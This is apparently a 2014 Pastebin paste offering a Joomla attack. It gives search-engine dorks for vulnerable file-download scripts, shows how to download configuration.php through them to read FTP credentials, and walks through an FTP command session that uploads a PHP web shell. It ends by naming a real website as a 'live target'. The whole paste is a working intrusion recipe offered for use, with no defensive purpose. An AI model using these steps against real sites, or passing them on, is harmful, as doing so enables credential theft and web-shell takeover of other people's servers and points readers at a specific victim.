Googleinurl

[DORK]+[INFO]=> exploits by CoderSec

Jul 25th, 2014
1,484
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##################################################################################################
  2. # Exploit Title: Priv8 Exploit Upload Shell Via FTP CMD (Joomla)
  3. # Author: CoderSec
  4. # Contact: https://www.facebook.com/profile.php?id=100004954872423
  5. # Follow me on YOUTUBE : https://www.youtube.com/user/Dinz011
  6. # Date: 25/07/2014
  7. # Tested on : Windows
  8. ###################################################################################################
  9.  
  10. Dork:
  11. inurl:/download.php?file=
  12. inurl:/force-download.php?file=
  13. Explorer ur brain
  14.  
  15. Get Database :
  16. ww.site.com/download.php?file=configuration.php
  17. ww.site.com/force-download.php?file=configuration.php
  18.  
  19. Find FTP User And FTP Password On Database :
  20. var $Ftp_User : 'user'
  21. var $Ftp_pass : 'user'
  22. var $Ftp_root : 'public_html'
  23.  
  24. Upload Shell via FTP CMD
  25. 1. Open CMD
  26. Example :
  27. C:\Documents and Settings\USER> ftp site.com
  28. to www.site.com
  29. Connected to site.com
  30. username : user
  31. 331 Password Required for example
  32. Password : password
  33. user Loged in
  34. ftp> ls
  35. public_html ( view var $ftp_root ) --> If var $ftp_root : 'public_html' ( cd public_html )
  36. ftp>cd public_html
  37. ftp> put "C:\CoderSec.php" << shell
  38. Command Success
  39. File Transfered
  40.  
  41. Shell Access :
  42.  
  43. www.site.com/CoderSec.php
  44.  
  45. Live Target :
  46.  
  47. http://hisardoot.co.il/ISD/knife%20..%20configuration.php
  48.  
  49. Ex : http://www8.0zz0.com/2014/07/25/09/326538625.jpg
RAW Paste Data